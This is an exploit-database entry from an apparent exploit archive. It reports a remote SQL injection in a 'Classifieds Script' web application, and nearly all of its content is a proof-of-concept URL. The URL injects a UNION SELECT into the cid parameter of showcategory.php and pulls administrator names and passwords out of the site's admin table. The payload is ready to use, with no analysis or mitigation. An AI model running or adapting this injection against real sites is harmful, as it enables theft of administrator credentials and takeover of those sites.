Classifieds Script (type) Remote SQL Injection Vulnerability

2009-12-30T00:00:00
ID 1337DAY-ID-10504
Type zdt
Reporter Hussin X
Modified 2009-12-30T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ============================================================
Classifieds Script (type) Remote SQL Injection Vulnerability
============================================================

POC :
 
http://[server]/showcategory.php?type=6&cid=-1+union+select+1,unhex(hex(concat(admin_name,0x3e,pwd))),3,4,5+from+freetplbanners_admin--
 


#  0day.today [2018-02-06]  #